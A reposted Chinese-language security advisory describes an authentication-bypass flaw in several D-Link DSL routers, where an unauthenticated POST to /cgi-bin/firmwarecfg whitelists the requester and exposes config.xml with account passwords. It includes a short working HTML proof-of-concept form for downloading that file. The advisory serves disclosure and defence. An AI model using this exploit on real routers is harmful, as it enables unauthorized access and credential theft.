欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

D-Link DSL路由器可绕过访问认证漏洞

来源:绿盟科技 作者:不详 时间:2005-05-21 TAG: 我要投稿
受影响系统:
D-Link DSL -G604T
D-Link DSL -562T
D-Link DSL -504T
D-Link DSL -502T
描述:
BUGTRAQ  ID: 13679

D-Link DSL路由器是家庭和小型办公室常用的路由器。

D-Link DSL路由器对用户访问的认证存在问题,远程攻击者可能利用此漏洞非授权访问设备。

在执行CGI /cgi-bin/firmwarecfg时,脚本会检查在/var/tmp/中是否存在fw_ip文件。如果存在这个文件的话,就会允许其中列出的所有IP地址无需认证直接访问设备。如果不存在这个文件的话,CGI就会创建一个新文件,在其中写入请求地址。

如果可以从Internet访问Web配置控制台且之前没人调用过CGI的话,则任何用户都可以访问路由器,下载包含有用户帐号和口令的config.xml文件,导致访问专用网络,修改或更改路由器的固件等。

<*来源:Francesco Orro (francesco.orro@akhela.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111652806030943&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html><head>Download config.xml:<title>GetConfig - Config file
download</title></head><body>

<script lang="javascript">
function invia_richiesta()
{
document.DownloadConfig.action='http://'+document.InputBox.Host.value+'/cgi-
bin/firmwarecfg';
document.DownloadConfig.submit();
}
</script>

<form name="InputBox">
<br>http://<input Name="Host" type="text" value="">/cgi-bin/firmwarecfg<br>
</form>
<form name="DownloadConfig" method="POST" action=""
enctype="multipart/form-data">
<input type="Submit" name="config" value="Download"
><br>
</form></body></html>

建议:
厂商补丁:

D-Link
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.dlink.com/

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载